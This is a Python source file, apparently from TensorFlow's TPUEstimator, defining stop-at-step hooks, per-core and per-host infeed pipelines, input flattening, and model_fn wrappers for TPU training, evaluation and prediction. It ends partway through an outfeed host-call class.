class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
  This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with the
  following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
  again in `after_run` to ensure the latest value is retrieved, avoiding a race
  condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
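  # Worked example (hypothetical numbers): with self._iterations == 100,
  # global_step == 950 and last_step == 1000, the gap is 50, so the next TPU
  # loop runs min(50, 100) == 50 iterations and training stops exactly at
  # step 1000.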
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
    # This is not strictly necessary, as we do not run infeed enqueue and
    # outfeed dequeue in side threads for the prediction model. But it makes
    # TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
      # immediately.
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
              'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
  # TODO(ylc): Refactor the code to merge the tpu ordinal logic here with
  # _InternalTPUContext.tpu_ordinal_function. We should either introduce another
  # abstraction or a different helper method.
def _tpu_ordinal_function_impl(shard_index_in_host):
# We put both enqueue/dequeue op at tpu.core(0) in each replica.
replica = ctx.device_assignment.lookup_replicas(
host_id, (0, 0, 0))[shard_index_in_host]
return ctx.device_assignment.tpu_ordinal(replica=replica)
if ctx.model_parallelism_enabled:
tpu_ordinal_function = _tpu_ordinal_function_impl
else:
tpu_ordinal_function = None
def enqueue_ops_fn():
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels, signals)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
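# A hedged sketch of an `input_fn` compatible with the per-host enqueue path
# above (the file path and `parse_fn` below are illustrative placeholders):
#
#   def input_fn(params):
#     batch_size = params['batch_size']  # per-host batch size from TPUEstimator
#     dataset = tf.data.TFRecordDataset('/path/to/data.tfrecord')
#     dataset = dataset.map(parse_fn).repeat().batch(batch_size)
#     return dataset  # TPU infeed requires statically shaped, fixed-size batches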
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
# TODO(b/XXX): Add predict support for PER_HOST_V2
      raise TypeError('Mode PREDICT not yet supported in PER_HOST_V2 mode.')
hooks.append(inputs.dataset_initializer_hook())
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
  may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
  The TPU infeed/outfeed library expects a flattened tensor list. So,
  `features` and `labels` need to be flattened before infeed enqueue, and their
  structure needs to be recorded in order to restore them after infeed dequeue.
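  As a hedged illustration (names are arbitrary), if `input_fn` returns
  `({'x': x, 'y': y}, labels)`, the recorder flattens it to the ordered list
  `[x, y, labels]` (feature keys sorted) for infeed enqueue, and after infeed
  dequeue restores the original `(features_dict, labels)` structure from that
  same recorded key order.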
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self):
# Holds the structure of inputs
self._feature_names = []
self._label_names = []
self._has_labels = False
self._signals_helper = None
# Internal state.
self._initialized = False
def has_labels(self):
return self._has_labels
def validate_and_record_structure(self, features, labels, signals=None):
"""Validates and records the structure of features` and `labels`."""
def _extract_key_names(tensor_or_dict):
if tensor_or_dict is None:
return []
return sorted(tensor_or_dict.keys()) if isinstance(
tensor_or_dict, dict) else []
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if signals is not None and self._signals_helper is None:
# Record signals helper.
self._signals_helper = _SignalsHelper(signals)
if self._initialized:
# Verify the structure is same. The following should never happen.
assert feature_names == self._feature_names, 'feature keys mismatched'
assert label_names == self._label_names, 'label keys mismatched'
assert has_labels == self._has_labels, 'label presence mismatched'
else:
# Record structure.
self._initialized = True
self._feature_names = feature_names
self._label_names = label_names
self._has_labels = has_labels
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
flattened_inputs = []
if self._feature_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend(
[features[name] for name in self._feature_names])
else:
flattened_inputs.append(features)
if labels is not None:
if self._label_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend([labels[name] for name in self._label_names])
else:
flattened_inputs.append(labels)
if signals is not None:
flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
return flattened_inputs
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
expected_num_features = (
len(self._feature_names) if self._feature_names else 1)
if self._has_labels:
expected_num_labels = (
len(self._label_names) if self._label_names else 1)
else:
expected_num_labels = 0
expected_num_signals = (
self._signals_helper.num_signals if self._signals_helper else 0)
expected_num_tensors = (
expected_num_features + expected_num_labels + expected_num_signals)
if expected_num_tensors != len(flattened_inputs):
raise ValueError(
            'The number of flattened tensors does not match the expected '
            'number. '
'Expected {}, got {}'.format(expected_num_tensors,
len(flattened_inputs)))
if self._feature_names:
unflattened_features = dict(
zip(self._feature_names, flattened_inputs[:expected_num_features]))
else:
# Single tensor case
unflattened_features = flattened_inputs[0]
if expected_num_labels == 0:
unflattened_label = None
elif self._label_names:
label_list = flattened_inputs[
expected_num_features:expected_num_features + expected_num_labels]
unflattened_label = dict(zip(self._label_names, label_list))
else:
# Single tensor case.
unflattened_label = flattened_inputs[expected_num_features]
signals = None
if expected_num_signals != 0:
tensor_list_for_signals = flattened_inputs[
expected_num_features + expected_num_labels:]
signals = self._signals_helper.unflatten(tensor_list_for_signals)
return _Inputs(unflattened_features, unflattened_label, signals=signals)
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
    # When tf.while_loop is called, the body function, which invokes the
    # `enqueue_fn` passed in, is called to construct the graph. So, the
    # input_fn structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
    # infeed_queue is used to generate dequeue ops. The only thing it uses for
    # dequeue is dtypes and shapes, so any one of the queues can be used. Here,
    # grab the first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
    # Perform some sanity checks to log user-friendly information. We should
    # ideally error out to give users a better error message. But if
    # _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
    # user code, so we only log a warning.
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/programmers_guide/datasets for '
                 'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
  This makes calling model_fn on CPU and TPU easier and more consistent and
  performs the necessary checks and mutations required by TPU training and
  evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
    all TPU shards. In addition, the input should be taken from the TPU infeed
    rather than from the input pipeline (input_fn) directly. To fit the TPU
    loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
      represents the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return train_step, host_call, captured_scaffold_fn
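  # Conceptually (a hedged sketch, not the exact call site in this file), the
  # returned `train_step` is then repeated on the device for
  # `iterations_per_loop` steps, threading the loss through the loop, e.g.:
  #
  #   loss = training_loop.repeat(iterations_per_loop, train_step, [init_loss])
  #
  # so that a single host-side `Session.run` drives many TPU steps.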
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
    For TPU evaluation, an eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
    all TPU shards. In addition, the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
      represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
            'estimator_spec used by TPU evaluation must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
      predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
            'estimator_spec used by TPU prediction must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return predict_step, host_calls, captured_scaffold_fn
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
    # TODO(xiejw): Add validation for the prediction dictionary.
    # TODO(xiejw): Add support for a single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(
key, tensor))
return predictions
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
    # Make deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
estimator_spec = self._model_fn(features=features, **kwargs)
if (self._ctx.is_running_on_cpu(is_export_mode) and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
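  # A minimal `model_fn` signature compatible with the dispatch above (hedged
  # sketch; the body is elided):
  #
  #   def model_fn(features, labels, mode, params):
  #     batch_size = params['batch_size']  # injected by TPUEstimator
  #     ...
  #
  # `params` must be declared; `labels`, `mode`, and `config` are passed only
  # if the signature declares them.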
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(err_msg.format('training_chief_hooks'))
if estimator_spec.training_hooks:
raise ValueError(err_msg.format('training_hooks'))
if estimator_spec.evaluation_hooks:
raise ValueError(err_msg.format('evaluation_hooks'))
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
